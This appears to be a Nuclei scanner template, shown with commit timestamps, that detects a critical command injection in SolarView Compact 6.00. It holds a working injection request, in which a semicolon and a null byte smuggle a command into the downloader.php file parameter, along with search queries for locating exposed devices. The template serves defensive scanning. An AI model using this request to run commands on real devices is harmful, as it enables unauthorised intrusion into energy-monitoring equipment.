nuclei-templates/http/cves/2023/CVE-2023-23333.yaml

51 lines
1.2 KiB
YAML
Raw Normal View History

2023-06-16 14:40:37 +00:00
id: CVE-2023-23333
info:
name: SolarView Compact 6.00 - OS Command Injection
author: Mr-xn
severity: critical
description: |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
reference:
- https://github.com/Timorlover/CVE-2023-23333
- https://github.com/Mr-xn/CVE-2023-23333
2023-06-16 18:05:39 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-23333
2023-06-16 14:40:37 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-23333
cwe-id: CWE-77
epss-score: 0.95016
metadata:
max-request: 1
2023-06-16 18:05:39 +00:00
verified: true
2023-06-16 14:40:37 +00:00
shodan-query: http.html:"SolarView Compact"
fofa-query: body="SolarView Compact" && title="Top"
2023-06-16 16:14:16 +00:00
tags: cve,cve2023,solarview,rce
2023-06-16 14:40:37 +00:00
variables:
2023-06-16 18:04:10 +00:00
cmd: "echo+CVE-2023-23333|rev"
2023-06-16 14:40:37 +00:00
http:
- raw:
- |
@timeout: 25s
GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1
Host: {{Hostname}}
2023-06-16 16:14:16 +00:00
matchers-condition: and
2023-06-16 14:40:37 +00:00
matchers:
2023-06-16 16:14:16 +00:00
- type: regex
2023-06-16 14:40:37 +00:00
part: body
2023-06-16 16:14:16 +00:00
regex:
2023-06-16 18:04:10 +00:00
- '33332-3202-EVC'
2023-06-16 16:14:16 +00:00
- type: word
part: header
2023-06-16 14:40:37 +00:00
words:
2023-06-16 16:14:16 +00:00
- "text/html"
- type: status
status:
- 200